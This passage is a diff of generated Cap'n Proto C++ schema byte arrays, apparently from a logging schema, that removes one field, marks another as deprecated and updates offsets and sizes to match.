0, 0, 0, 0, 0, 0, 0, - 113, 7, 0, 0, 186, 0, 0, 0, + 85, 7, 0, 0, 186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 116, 7, 0, 0, 3, 0, 1, 0, - 144, 7, 0, 0, 2, 0, 1, 0, + 88, 7, 0, 0, 3, 0, 1, 0, + 116, 7, 0, 0, 2, 0, 1, 0, 10, 0, 0, 0, 23, 0, 0, 0, 0, 0, 1, 0, 22, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 141, 7, 0, 0, 66, 0, 0, 0, + 113, 7, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 136, 7, 0, 0, 3, 0, 1, 0, - 148, 7, 0, 0, 2, 0, 1, 0, - 45, 0, 0, 0, 194, 2, 0, 0, + 108, 7, 0, 0, 3, 0, 1, 0, + 120, 7, 0, 0, 2, 0, 1, 0, + 44, 0, 0, 0, 194, 2, 0, 0, 0, 0, 1, 0, 23, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 145, 7, 0, 0, 178, 0, 0, 0, + 117, 7, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 148, 7, 0, 0, 3, 0, 1, 0, - 160, 7, 0, 0, 2, 0, 1, 0, + 120, 7, 0, 0, 3, 0, 1, 0, + 132, 7, 0, 0, 2, 0, 1, 0, 20, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 157, 7, 0, 0, 90, 0, 0, 0, + 129, 7, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 156, 7, 0, 0, 3, 0, 1, 0, - 168, 7, 0, 0, 2, 0, 1, 0, + 128, 7, 0, 0, 3, 0, 1, 0, + 140, 7, 0, 0, 2, 0, 1, 0, 21, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 25, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 165, 7, 0, 0, 90, 0, 0, 0, + 137, 7, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 164, 7, 0, 0, 3, 0, 1, 0, - 176, 7, 0, 0, 2, 0, 1, 0, - 53, 0, 0, 0, 24, 0, 0, 0, + 136, 7, 0, 0, 3, 0, 1, 0, + 148, 7, 0, 0, 2, 0, 1, 0, + 52, 0, 0, 0, 24, 0, 0, 0, 0, 0, 1, 0, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 173, 7, 0, 0, 210, 0, 0, 0, + 145, 7, 0, 0, 210, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 180, 7, 0, 0, 3, 0, 1, 0, - 192, 7, 0, 0, 2, 0, 1, 0, - 49, 0, 0, 0, 25, 0, 0, 0, + 152, 7, 0, 0, 3, 0, 1, 0, + 164, 7, 0, 0, 2, 0, 1, 0, + 48, 0, 0, 0, 25, 0, 0, 0, 0, 0, 1, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 189, 7, 0, 0, 202, 0, 0, 0, + 161, 7, 0, 0, 202, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 196, 7, 0, 0, 3, 0, 1, 0, - 208, 7, 0, 0, 2, 0, 1, 0, + 168, 7, 0, 0, 3, 0, 1, 0, + 180, 7, 0, 0, 2, 0, 1, 0, 1, 0, 0, 0, 13, 0, 0, 0, 0, 0, 1, 0, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 205, 7, 0, 0, 202, 0, 0, 0, + 177, 7, 0, 0, 202, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 212, 7, 0, 0, 3, 0, 1, 0, - 224, 7, 0, 0, 2, 0, 1, 0, - 59, 0, 0, 0, 28, 0, 0, 0, + 184, 7, 0, 0, 3, 0, 1, 0, + 196, 7, 0, 0, 2, 0, 1, 0, + 58, 0, 0, 0, 28, 0, 0, 0, 0, 0, 1, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 221, 7, 0, 0, 18, 1, 0, 0, + 193, 7, 0, 0, 18, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 232, 7, 0, 0, 3, 0, 1, 0, - 244, 7, 0, 0, 2, 0, 1, 0, + 204, 7, 0, 0, 3, 0, 1, 0, + 216, 7, 0, 0, 2, 0, 1, 0, 7, 0, 0, 0, 45, 0, 0, 0, 0, 0, 1, 0, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 241, 7, 0, 0, 138, 0, 0, 0, + 213, 7, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 244, 7, 0, 0, 3, 0, 1, 0, - 0, 8, 0, 0, 2, 0, 1, 0, + 216, 7, 0, 0, 3, 0, 1, 0, + 228, 7, 0, 0, 2, 0, 1, 0, 3, 0, 0, 0, 58, 0, 0, 0, 0, 0, 1, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 253, 7, 0, 0, 50, 0, 0, 0, + 225, 7, 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 248, 7, 0, 0, 3, 0, 1, 0, - 4, 8, 0, 0, 2, 0, 1, 0, - 33, 0, 0, 0, 30, 0, 0, 0, + 220, 7, 0, 0, 3, 0, 1, 0, + 232, 7, 0, 0, 2, 0, 1, 0, + 32, 0, 0, 0, 30, 0, 0, 0, 0, 0, 1, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 1, 8, 0, 0, 146, 0, 0, 0, + 229, 7, 0, 0, 146, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 4, 8, 0, 0, 3, 0, 1, 0, - 16, 8, 0, 0, 2, 0, 1, 0, + 232, 7, 0, 0, 3, 0, 1, 0, + 244, 7, 0, 0, 2, 0, 1, 0, 14, 0, 0, 0, 31, 0, 0, 0, 0, 0, 1, 0, 33, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 13, 8, 0, 0, 90, 0, 0, 0, + 241, 7, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 12, 8, 0, 0, 3, 0, 1, 0, - 24, 8, 0, 0, 2, 0, 1, 0, - 42, 0, 0, 0, 32, 0, 0, 0, + 240, 7, 0, 0, 3, 0, 1, 0, + 252, 7, 0, 0, 2, 0, 1, 0, + 41, 0, 0, 0, 32, 0, 0, 0, 0, 0, 1, 0, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 21, 8, 0, 0, 146, 0, 0, 0, + 249, 7, 0, 0, 146, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 24, 8, 0, 0, 3, 0, 1, 0, - 36, 8, 0, 0, 2, 0, 1, 0, + 252, 7, 0, 0, 3, 0, 1, 0, + 8, 8, 0, 0, 2, 0, 1, 0, 15, 0, 0, 0, 33, 0, 0, 0, 0, 0, 1, 0, 35, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 33, 8, 0, 0, 66, 0, 0, 0, + 5, 8, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 28, 8, 0, 0, 3, 0, 1, 0, - 40, 8, 0, 0, 2, 0, 1, 0, + 0, 8, 0, 0, 3, 0, 1, 0, + 12, 8, 0, 0, 2, 0, 1, 0, 5, 0, 0, 0, 195, 2, 0, 0, 0, 0, 1, 0, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 37, 8, 0, 0, 58, 0, 0, 0, + 9, 8, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 32, 8, 0, 0, 3, 0, 1, 0, - 44, 8, 0, 0, 2, 0, 1, 0, + 4, 8, 0, 0, 3, 0, 1, 0, + 16, 8, 0, 0, 2, 0, 1, 0, 16, 0, 0, 0, 34, 0, 0, 0, 0, 0, 1, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 41, 8, 0, 0, 82, 0, 0, 0, + 13, 8, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 40, 8, 0, 0, 3, 0, 1, 0, - 52, 8, 0, 0, 2, 0, 1, 0, + 12, 8, 0, 0, 3, 0, 1, 0, + 24, 8, 0, 0, 2, 0, 1, 0, 22, 0, 0, 0, 59, 0, 0, 0, 0, 0, 1, 0, 38, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 49, 8, 0, 0, 98, 0, 0, 0, + 21, 8, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 48, 8, 0, 0, 3, 0, 1, 0, - 60, 8, 0, 0, 2, 0, 1, 0, + 20, 8, 0, 0, 3, 0, 1, 0, + 32, 8, 0, 0, 2, 0, 1, 0, 23, 0, 0, 0, 70, 0, 0, 0, 0, 0, 1, 0, 39, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 57, 8, 0, 0, 82, 0, 0, 0, + 29, 8, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 56, 8, 0, 0, 3, 0, 1, 0, - 68, 8, 0, 0, 2, 0, 1, 0, - 50, 0, 0, 0, 196, 2, 0, 0, + 28, 8, 0, 0, 3, 0, 1, 0, + 40, 8, 0, 0, 2, 0, 1, 0, + 49, 0, 0, 0, 196, 2, 0, 0, 0, 0, 1, 0, 40, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 65, 8, 0, 0, 218, 0, 0, 0, + 37, 8, 0, 0, 218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 72, 8, 0, 0, 3, 0, 1, 0, - 84, 8, 0, 0, 2, 0, 1, 0, + 44, 8, 0, 0, 3, 0, 1, 0, + 56, 8, 0, 0, 2, 0, 1, 0, 27, 0, 0, 0, 197, 2, 0, 0, 0, 0, 1, 0, 41, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 81, 8, 0, 0, 90, 0, 0, 0, + 53, 8, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 80, 8, 0, 0, 3, 0, 1, 0, - 92, 8, 0, 0, 2, 0, 1, 0, + 52, 8, 0, 0, 3, 0, 1, 0, + 64, 8, 0, 0, 2, 0, 1, 0, 24, 0, 0, 0, 36, 0, 0, 0, 0, 0, 1, 0, 42, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 89, 8, 0, 0, 146, 0, 0, 0, + 61, 8, 0, 0, 146, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 92, 8, 0, 0, 3, 0, 1, 0, - 104, 8, 0, 0, 2, 0, 1, 0, - 46, 0, 0, 0, 198, 2, 0, 0, + 64, 8, 0, 0, 3, 0, 1, 0, + 76, 8, 0, 0, 2, 0, 1, 0, + 45, 0, 0, 0, 198, 2, 0, 0, 0, 0, 1, 0, 43, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 101, 8, 0, 0, 234, 0, 0, 0, + 73, 8, 0, 0, 234, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 108, 8, 0, 0, 3, 0, 1, 0, - 120, 8, 0, 0, 2, 0, 1, 0, + 80, 8, 0, 0, 3, 0, 1, 0, + 92, 8, 0, 0, 2, 0, 1, 0, 25, 0, 0, 0, 3, 0, 0, 0, 0, 0, 1, 0, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 117, 8, 0, 0, 82, 0, 0, 0, + 89, 8, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 116, 8, 0, 0, 3, 0, 1, 0, - 128, 8, 0, 0, 2, 0, 1, 0, - 48, 0, 0, 0, 4, 0, 0, 0, + 88, 8, 0, 0, 3, 0, 1, 0, + 100, 8, 0, 0, 2, 0, 1, 0, + 47, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 45, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 125, 8, 0, 0, 170, 0, 0, 0, + 97, 8, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 128, 8, 0, 0, 3, 0, 1, 0, - 140, 8, 0, 0, 2, 0, 1, 0, - 55, 0, 0, 0, 37, 0, 0, 0, + 100, 8, 0, 0, 3, 0, 1, 0, + 112, 8, 0, 0, 2, 0, 1, 0, + 54, 0, 0, 0, 37, 0, 0, 0, 0, 0, 1, 0, 46, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 137, 8, 0, 0, 170, 0, 0, 0, + 109, 8, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 140, 8, 0, 0, 3, 0, 1, 0, - 152, 8, 0, 0, 2, 0, 1, 0, - 51, 0, 0, 0, 199, 2, 0, 0, + 112, 8, 0, 0, 3, 0, 1, 0, + 124, 8, 0, 0, 2, 0, 1, 0, + 50, 0, 0, 0, 199, 2, 0, 0, 0, 0, 1, 0, 47, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 149, 8, 0, 0, 186, 0, 0, 0, + 121, 8, 0, 0, 186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 152, 8, 0, 0, 3, 0, 1, 0, - 164, 8, 0, 0, 2, 0, 1, 0, + 124, 8, 0, 0, 3, 0, 1, 0, + 136, 8, 0, 0, 2, 0, 1, 0, 0, 0, 0, 0, 19, 0, 0, 0, 0, 0, 1, 0, 48, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 161, 8, 0, 0, 114, 0, 0, 0, + 133, 8, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 160, 8, 0, 0, 3, 0, 1, 0, - 172, 8, 0, 0, 2, 0, 1, 0, - 56, 0, 0, 0, 200, 2, 0, 0, + 132, 8, 0, 0, 3, 0, 1, 0, + 144, 8, 0, 0, 2, 0, 1, 0, + 55, 0, 0, 0, 200, 2, 0, 0, 0, 0, 1, 0, 49, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 169, 8, 0, 0, 154, 0, 0, 0, + 141, 8, 0, 0, 154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 172, 8, 0, 0, 3, 0, 1, 0, - 184, 8, 0, 0, 2, 0, 1, 0, + 144, 8, 0, 0, 3, 0, 1, 0, + 156, 8, 0, 0, 2, 0, 1, 0, 2, 0, 0, 0, 20, 0, 0, 0, 0, 0, 1, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 181, 8, 0, 0, 162, 0, 0, 0, + 153, 8, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 184, 8, 0, 0, 3, 0, 1, 0, - 196, 8, 0, 0, 2, 0, 1, 0, + 156, 8, 0, 0, 3, 0, 1, 0, + 168, 8, 0, 0, 2, 0, 1, 0, 19, 0, 0, 0, 201, 2, 0, 0, 0, 0, 1, 0, 51, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 193, 8, 0, 0, 90, 0, 0, 0, + 165, 8, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 192, 8, 0, 0, 3, 0, 1, 0, - 204, 8, 0, 0, 2, 0, 1, 0, - 31, 0, 0, 0, 0, 0, 0, 0, + 164, 8, 0, 0, 3, 0, 1, 0, + 176, 8, 0, 0, 2, 0, 1, 0, + 30, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 149, 70, 68, 107, 77, 145, 91, 253, - 201, 8, 0, 0, 162, 0, 0, 0, + 173, 8, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 52, 0, 0, 0, 202, 2, 0, 0, + 51, 0, 0, 0, 202, 2, 0, 0, 0, 0, 1, 0, 54, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 185, 8, 0, 0, 194, 0, 0, 0, + 157, 8, 0, 0, 194, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 188, 8, 0, 0, 3, 0, 1, 0, - 200, 8, 0, 0, 2, 0, 1, 0, + 160, 8, 0, 0, 3, 0, 1, 0, + 172, 8, 0, 0, 2, 0, 1, 0, 26, 0, 0, 0, 84, 0, 0, 0, 0, 0, 1, 0, 56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 197, 8, 0, 0, 90, 0, 0, 0, + 169, 8, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 196, 8, 0, 0, 3, 0, 1, 0, - 208, 8, 0, 0, 2, 0, 1, 0, + 168, 8, 0, 0, 3, 0, 1, 0, + 180, 8, 0, 0, 2, 0, 1, 0, 29, 0, 0, 0, 43, 0, 0, 0, 0, 0, 1, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 205, 8, 0, 0, 130, 0, 0, 0, + 177, 8, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 204, 8, 0, 0, 3, 0, 1, 0, - 216, 8, 0, 0, 2, 0, 1, 0, + 176, 8, 0, 0, 3, 0, 1, 0, + 188, 8, 0, 0, 2, 0, 1, 0, 17, 0, 0, 0, 44, 0, 0, 0, 0, 0, 1, 0, 61, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 213, 8, 0, 0, 138, 0, 0, 0, + 185, 8, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 216, 8, 0, 0, 3, 0, 1, 0, - 228, 8, 0, 0, 2, 0, 1, 0, + 188, 8, 0, 0, 3, 0, 1, 0, + 200, 8, 0, 0, 2, 0, 1, 0, 18, 0, 0, 0, 45, 0, 0, 0, 0, 0, 1, 0, 62, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 225, 8, 0, 0, 170, 0, 0, 0, + 197, 8, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 228, 8, 0, 0, 3, 0, 1, 0, - 240, 8, 0, 0, 2, 0, 1, 0, + 200, 8, 0, 0, 3, 0, 1, 0, + 212, 8, 0, 0, 2, 0, 1, 0, 11, 0, 0, 0, 46, 0, 0, 0, 0, 0, 1, 0, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 237, 8, 0, 0, 122, 0, 0, 0, + 209, 8, 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 236, 8, 0, 0, 3, 0, 1, 0, - 248, 8, 0, 0, 2, 0, 1, 0, + 208, 8, 0, 0, 3, 0, 1, 0, + 220, 8, 0, 0, 2, 0, 1, 0, 6, 0, 0, 0, 203, 2, 0, 0, 0, 0, 1, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 245, 8, 0, 0, 138, 0, 0, 0, + 217, 8, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 248, 8, 0, 0, 3, 0, 1, 0, - 4, 9, 0, 0, 2, 0, 1, 0, - 30, 0, 0, 0, 204, 2, 0, 0, - 0, 0, 1, 0, 66, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 9, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 4, 9, 0, 0, 3, 0, 1, 0, - 16, 9, 0, 0, 2, 0, 1, 0, + 220, 8, 0, 0, 3, 0, 1, 0, + 232, 8, 0, 0, 2, 0, 1, 0, 118, 69, 103, 111, 68, 69, 80, 82, 69, 67, 65, 84, 69, 68, 0, 0, 10, 0, 0, 0, 0, 0, 0, 0, @@ -8393,16 +8368,6 @@ static const ::capnp::_::AlignedData<1072> b_97ff69c53601abf1 = { 101, 120, 112, 101, 114, 105, 109, 101, 110, 116, 97, 108, 77, 111, 100, 101, 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 65, 108, 116, 65, 99, 116, 105, - 118, 101, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, @@ -8421,11 +8386,11 @@ static const ::capnp::_::RawSchema* const d_97ff69c53601abf1[] = { &s_f5a5e26c954e339e, &s_fd5b914d6b444695, }; -static const uint16_t m_97ff69c53601abf1[] = {1, 35, 11, 10, 36, 42, 39, 54, 45, 38, 24, 25, 44, 27, 13, 26, 55, 16, 21, 15, 37, 53, 47, 56, 57, 60, 43, 19, 41, 59, 51, 40, 14, 12, 52, 50, 30, 28, 49, 18, 17, 23, 48, 31, 20, 29, 33, 34, 5, 9, 4, 8, 22, 58, 46, 0, 32, 2, 3, 6, 7}; -static const uint16_t i_97ff69c53601abf1[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60}; +static const uint16_t m_97ff69c53601abf1[] = {1, 35, 11, 10, 36, 42, 39, 54, 45, 38, 24, 25, 44, 27, 13, 26, 55, 16, 21, 15, 37, 53, 47, 56, 57, 43, 19, 41, 59, 51, 40, 14, 12, 52, 50, 30, 28, 49, 18, 17, 23, 48, 31, 20, 29, 33, 34, 5, 9, 4, 8, 22, 58, 46, 0, 32, 2, 3, 6, 7}; +static const uint16_t i_97ff69c53601abf1[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59}; const ::capnp::_::RawSchema s_97ff69c53601abf1 = { - 0x97ff69c53601abf1, b_97ff69c53601abf1.words, 1072, d_97ff69c53601abf1, m_97ff69c53601abf1, - 6, 61, i_97ff69c53601abf1, nullptr, nullptr, { &s_97ff69c53601abf1, nullptr, nullptr, 0, 0, nullptr } + 0x97ff69c53601abf1, b_97ff69c53601abf1.words, 1055, d_97ff69c53601abf1, m_97ff69c53601abf1, + 6, 60, i_97ff69c53601abf1, nullptr, nullptr, { &s_97ff69c53601abf1, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE static const ::capnp::_::AlignedData<43> b_dbe58b96d2d1ac61 = { @@ -9717,7 +9682,7 @@ const ::capnp::_::RawSchema s_a63a46f0f2889b2d = { 0, 4, i_a63a46f0f2889b2d, nullptr, nullptr, { &s_a63a46f0f2889b2d, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<131> b_fd5b914d6b444695 = { +static const ::capnp::_::AlignedData<132> b_fd5b914d6b444695 = { { 0, 0, 0, 0, 5, 0, 6, 0, 149, 70, 68, 107, 77, 145, 91, 253, 24, 0, 0, 0, 1, 0, 24, 0, @@ -9754,38 +9719,38 @@ static const ::capnp::_::AlignedData<131> b_fd5b914d6b444695 = { 6, 0, 253, 255, 5, 0, 0, 0, 0, 0, 1, 0, 55, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 197, 0, 0, 0, 74, 0, 0, 0, + 197, 0, 0, 0, 154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 196, 0, 0, 0, 3, 0, 1, 0, - 208, 0, 0, 0, 2, 0, 1, 0, + 200, 0, 0, 0, 3, 0, 1, 0, + 212, 0, 0, 0, 2, 0, 1, 0, 2, 0, 252, 255, 5, 0, 0, 0, 0, 0, 1, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 205, 0, 0, 0, 90, 0, 0, 0, + 209, 0, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 204, 0, 0, 0, 3, 0, 1, 0, - 216, 0, 0, 0, 2, 0, 1, 0, + 208, 0, 0, 0, 3, 0, 1, 0, + 220, 0, 0, 0, 2, 0, 1, 0, 3, 0, 251, 255, 5, 0, 0, 0, 0, 0, 1, 0, 59, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 213, 0, 0, 0, 90, 0, 0, 0, + 217, 0, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 212, 0, 0, 0, 3, 0, 1, 0, - 224, 0, 0, 0, 2, 0, 1, 0, + 216, 0, 0, 0, 3, 0, 1, 0, + 228, 0, 0, 0, 2, 0, 1, 0, 4, 0, 250, 255, 5, 0, 0, 0, 0, 0, 1, 0, 60, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 221, 0, 0, 0, 98, 0, 0, 0, + 225, 0, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 220, 0, 0, 0, 3, 0, 1, 0, - 232, 0, 0, 0, 2, 0, 1, 0, + 224, 0, 0, 0, 3, 0, 1, 0, + 236, 0, 0, 0, 2, 0, 1, 0, 5, 0, 249, 255, 5, 0, 0, 0, 0, 0, 1, 0, 65, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 229, 0, 0, 0, 122, 0, 0, 0, + 233, 0, 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 228, 0, 0, 0, 3, 0, 1, 0, - 240, 0, 0, 0, 2, 0, 1, 0, + 232, 0, 0, 0, 3, 0, 1, 0, + 244, 0, 0, 0, 2, 0, 1, 0, 105, 110, 100, 105, 83, 116, 97, 116, 101, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, @@ -9805,7 +9770,8 @@ static const ::capnp::_::AlignedData<131> b_fd5b914d6b444695 = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 108, 113, 114, 83, 116, 97, 116, 101, - 0, 0, 0, 0, 0, 0, 0, 0, + 68, 69, 80, 82, 69, 67, 65, 84, + 69, 68, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 222, 42, 200, 144, 215, 226, 36, 144, 0, 0, 0, 0, 0, 0, 0, 0, @@ -9865,7 +9831,7 @@ static const ::capnp::_::RawSchema* const d_fd5b914d6b444695[] = { static const uint16_t m_fd5b914d6b444695[] = {3, 6, 4, 0, 2, 1, 5}; static const uint16_t i_fd5b914d6b444695[] = {0, 1, 2, 3, 4, 5, 6}; const ::capnp::_::RawSchema s_fd5b914d6b444695 = { - 0xfd5b914d6b444695, b_fd5b914d6b444695.words, 131, d_fd5b914d6b444695, m_fd5b914d6b444695, + 0xfd5b914d6b444695, b_fd5b914d6b444695.words, 132, d_fd5b914d6b444695, m_fd5b914d6b444695, 8, 7, i_fd5b914d6b444695, nullptr, nullptr, { &s_fd5b914d6b444695, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE @@ -10030,17 +9996,17 @@ const ::capnp::_::RawSchema s_c3cbae1fd505ae80 = { 0, 7, i_c3cbae1fd505ae80, nullptr, nullptr, { &s_c3cbae1fd505ae80, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<451> b_c4713f6b0d36abe9 = { +static const ::capnp::_::AlignedData<468> b_c4713f6b0d36abe9 = { { 0, 0, 0, 0, 5, 0, 6, 0, 233, 171, 54, 13, 107, 63, 113, 196, - 10, 0, 0, 0, 1, 0, 5, 0, + 10, 0, 0, 0, 1, 0, 6, 0, 91, 40, 164, 37, 126, 241, 177, 243, 15, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 178, 0, 0, 0, 29, 0, 0, 0, 103, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 121, 0, 0, 0, 71, 5, 0, 0, + 121, 0, 0, 0, 127, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 108, 111, 103, 46, 99, 97, 112, 110, @@ -10071,175 +10037,182 @@ static const ::capnp::_::AlignedData<451> b_c4713f6b0d36abe9 = { 101, 80, 114, 101, 100, 105, 99, 116, 105, 111, 110, 115, 0, 0, 0, 0, 80, 111, 115, 101, 0, 0, 0, 0, - 96, 0, 0, 0, 3, 0, 4, 0, + 100, 0, 0, 0, 3, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 145, 2, 0, 0, 66, 0, 0, 0, + 173, 2, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 140, 2, 0, 0, 3, 0, 1, 0, - 152, 2, 0, 0, 2, 0, 1, 0, + 168, 2, 